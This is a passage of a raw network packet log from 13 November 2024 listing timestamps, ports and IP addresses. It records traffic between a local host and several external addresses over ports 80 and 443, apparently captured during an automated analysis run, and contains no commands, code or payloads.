Nov 13, 2024 20:39:23.201817036 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.201867104 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.201901913 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.201917887 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.201942921 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.242187977 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.242214918 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.242233038 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.242468119 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.256207943 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.256246090 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.256340027 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.256366014 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.256411076 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.279575109 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.279617071 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.279709101 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.279726028 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.279769897 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.280771971 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.280803919 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.280843019 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.280852079 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.280894041 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.282267094 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.282293081 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.282346010 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.282354116 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.282396078 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.283179045 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.283205032 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.283242941 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.283248901 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.283271074 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.283293962 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.284223080 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.284254074 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.284317970 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.284326077 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.284368038 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.311139107 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.311201096 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.311235905 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.311237097 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.311271906 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.311280012 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.311301947 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.311306000 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.311322927 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.311361074 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.311366081 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.311408997 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.311496973 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.311531067 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.311542034 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.311564922 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.311592102 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.311620951 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.311877966 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.311911106 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.311922073 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.311947107 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.311956882 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.311980963 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.312011957 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.312017918 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.312047005 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.312073946 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.312524080 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.312557936 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.312570095 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.312596083 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.312603951 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.312638998 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.320667982 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.320739985 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.320780039 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.320799112 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.320833921 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.320862055 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.359090090 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.359116077 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.359133005 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.359236002 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.373114109 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.373239994 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.373256922 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.373296022 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.373301029 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.373348951 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.373378038 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.373409986 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.373421907 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.373430967 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.373435974 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.413440943 CET	49724	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.413480043 CET	443	49724	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.413582087 CET	49724	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.414169073 CET	49724	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.414180994 CET	443	49724	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.415102005 CET	49725	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.415159941 CET	443	49725	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.415215969 CET	49725	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.415318012 CET	49725	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.415328979 CET	443	49725	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.416528940 CET	49726	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.416538954 CET	443	49726	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.416589022 CET	49726	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.417387962 CET	49727	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.417398930 CET	443	49727	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.417443037 CET	49727	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.417491913 CET	49726	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.417504072 CET	443	49726	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.418334961 CET	49728	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.418343067 CET	443	49728	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.418386936 CET	49728	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.418442011 CET	49727	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.418453932 CET	443	49727	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.418518066 CET	49728	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.418528080 CET	443	49728	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.427923918 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.428000927 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.428004980 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.428024054 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.428050995 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.428076029 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.428091049 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.428097963 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.428107977 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.428122997 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.428133965 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.428133965 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.428148985 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.428179026 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.428582907 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.428606033 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.428622007 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.428631067 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.428637028 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.428646088 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.428653955 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.428659916 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.428678036 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.428689957 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.429074049 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.429090023 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.429106951 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.429112911 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.429132938 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.430697918 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.476255894 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.476288080 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.476305008 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.476320982 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.476339102 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.476407051 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.476438999 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.544656992 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.544691086 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.544715881 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.544727087 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.544740915 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.544753075 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.544758081 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.544763088 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.544774055 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.544776917 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.544790983 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.544795036 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.544806957 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.544816017 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.544826031 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.544831991 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.544847012 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.544867039 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.545439959 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.545466900 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.545481920 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.545504093 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.545521975 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.545763969 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.545779943 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.545794964 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.545816898 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.545845032 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.592950106 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.592976093 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.592993975 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.593014956 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.593050003 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.593076944 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.593120098 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.593122005 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.593159914 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.593209028 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.593234062 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.593250990 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.593271017 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.663430929 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.663496017 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.663532972 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.663568974 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.663604975 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.663639069 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.663675070 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.663703918 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.663703918 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.663703918 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.663703918 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.663790941 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.663790941 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.663865089 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.663918018 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.663958073 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.663992882 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.664010048 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.664027929 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.664046049 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.664062023 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.664084911 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.664098024 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.664105892 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.664134026 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.664151907 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.664182901 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.664753914 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.664810896 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.710042000 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.710098982 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.710119963 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.710133076 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.710139036 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.710167885 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.710179090 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.710205078 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.710211992 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.710238934 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.710244894 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.710341930 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.710894108 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.710947990 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.778450966 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.778489113 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.778523922 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.778553009 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.778553009 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.778573036 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.778609037 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.778625965 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.778625965 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.778646946 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.778696060 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.778696060 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.778718948 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.778755903 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.778770924 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.778793097 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.778804064 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.778844118 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.779218912 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.779273033 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.779273987 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.779308081 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.779355049 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.779355049 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.779356956 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.779392004 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.779412031 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.779427052 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.779436111 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.779476881 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.826757908 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.826796055 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.826831102 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.826883078 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.826916933 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.826942921 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.826942921 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.826942921 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.826942921 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.826988935 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.827018976 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.827022076 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.827045918 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.827066898 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.827164888 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.827198029 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.827217102 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.827233076 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.827250004 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.827272892 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.895083904 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.895116091 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.895216942 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.895216942 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.895246029 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.895279884 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.895291090 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.895332098 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.895334005 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.895366907 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.895380974 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.895416975 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.895585060 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.895637035 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.895792007 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.895823002 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.895848036 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.895875931 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.895900011 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.895910025 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.895920038 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.895946026 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.895960093 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.896018028 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.896272898 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.896325111 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.896328926 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.896361113 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.896378040 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.896394014 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.896408081 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.896430969 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.896435976 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.896480083 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.910753012 CET	49729	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:23.910800934 CET	443	49729	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:23.910876989 CET	49729	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:23.911461115 CET	49729	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:23.911477089 CET	443	49729	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:23.943556070 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.943613052 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.943643093 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.943703890 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.943711996 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.943711996 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.943737030 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.943748951 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.943773985 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.943803072 CET	49720	80	192.168.2.5	185.215.113.206
